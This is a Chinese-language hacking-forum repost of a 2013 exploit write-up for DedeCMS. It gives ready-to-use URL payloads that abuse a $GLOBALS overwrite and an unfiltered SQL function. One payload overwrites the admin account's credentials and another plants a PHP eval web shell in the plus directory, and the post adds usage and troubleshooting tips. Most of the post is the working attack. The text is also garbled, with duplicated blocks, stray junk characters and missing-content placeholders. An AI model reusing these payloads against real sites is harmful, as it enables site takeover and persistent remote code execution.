|
|
此漏洞无视gpc转义,过80sec注入防御。' A$ |# g" `* P& u9 ^: K
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
& c" Q4 s$ s4 h' a起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
& b: q1 R/ |* [0 K! _" F" Minclude/dedesql.class.php- r! F, S$ w1 M/ [1 l5 Y
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。- h( i* C% N7 V2 M# o
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2! f. R6 I2 C2 t- o5 M" b& Z
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。# D& }; E' Q4 }+ |: r$ K' s- ~4 A
plus/download.php( S. z( ^9 t7 \' K$ {# W
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
0 c8 W6 b4 \8 x4 Y1 F" }admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
- s* o6 C1 k* ?; @- cUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP: L- R: H/ X) q$ P
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin) v3 d' b4 D% d R
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
" T9 ~- @" ^1 y7 `. L( ]0 p如果找不到后台,参见以前修改数据库直接拿SHELL的方法3 X" v% [2 \' i# u; Q- K+ E; [2 j. t, E
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。
$ t& l2 |" w2 ?7 O/ x! l! ]& z补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?# l8 _: o! B. N N- Q
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
, p( u2 K" g0 v; T! finclude/dedesql.class.php ^6 H2 b- E0 H- H
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。
2 h( k2 i8 d( m# M同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
8 B5 ?4 J n( X. u6 E0 E而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
, N. c( P" I% P+ xplus/download.php9 g$ k; \& b. j6 _+ N
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):" t+ a& @: j+ G$ {# z
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:' P9 b$ `! R0 P. v* A9 e
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:' \5 g" ] k: v. o# P1 B
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
- r4 x& o# v4 o' ^! f( c漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
9 o. U5 C6 f, q如果找不到后台,参见以前修改数据库直接拿SHELL的方法
7 k8 J. U8 G4 G7 K) c+ H% O, W___FCKpd___6getshell:
' `2 G' r5 V- n0 Y5 n7 _http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m
1 r2 O) f3 `- k; o+ phttp://127.0.0.1/plus/x.php+ c: a1 i$ B# j# I o! ?
update成功后还要访问下 /plus/mytag_js.php?aid=1
6 C. |# J. ^& O失败原因:' l# s8 @, o% y: _6 m' u
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
j% w8 p% Q1 D+ h8 x; F. K配图:
! i9 ]% }* \. x: ^- e1.查看dede当前版本
8 U$ Z4 Y7 \4 F: g5 I- P2 `) h+ p! S1 Z$ ~
2.执行exp
3 }0 Y, d p8 i2 Q5 L+ f0 @) V
; O8 J3 z! ]) n4 L7 zhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
) a6 L8 R9 U7 s: \8 @. E9 B
7 W+ q/ c7 |) c0 Lspider密码admin! S0 ] b% s# Z5 q
3 ]+ @" \) c! B0 h/ h% u6 O4 j
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
& f* F% H& A' B9 m" W原作者:imspider
. B) b9 H! ?& C2 W
, W$ O- V/ A: e/ M( S# ?! n: H }本博客测试+配图+getshell. W- _% c: v' c
POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT 3 j4 z) N, h2 C1 p$ _' e2 z
( r% w |$ U; f/ Ngetshell:) O! d* {3 R+ B6 ^3 }
___FCKpd___7会在plus目录生成 x.php 密码 m& Z3 `& M+ ~1 {3 f7 z3 d
http://127.0.0.1/plus/x.php
4 X2 [9 a5 Z' i* O( c/ Yupdate成功后还要访问下 /plus/mytag_js.php?aid=1& |3 ^! u- b' c1 z% b# v! L
失败原因:
: u; u! E/ y# _. @* |测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)9 @9 G$ t' m0 L l% g& Z _& }
配图:
- l( M, G% b" D0 x( \6 Z1.查看dede当前版本
1 E; E- A4 V+ p& h+ ~ yhttp://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png; n4 M* Y. d$ l; d* U9 ?% G
2.执行exp5 j& e3 H# Y) U
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台; h: C x4 [5 ] _) j( G
spider密码admin& \0 p3 D1 R* Q) u, {2 Z {. x2 f
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png
2 h4 I9 B$ Z1 h) I- f( }
3 m S- \* G/ _# Q |
|
发表于 2013-9-21 16:08:21
收藏
支持
反对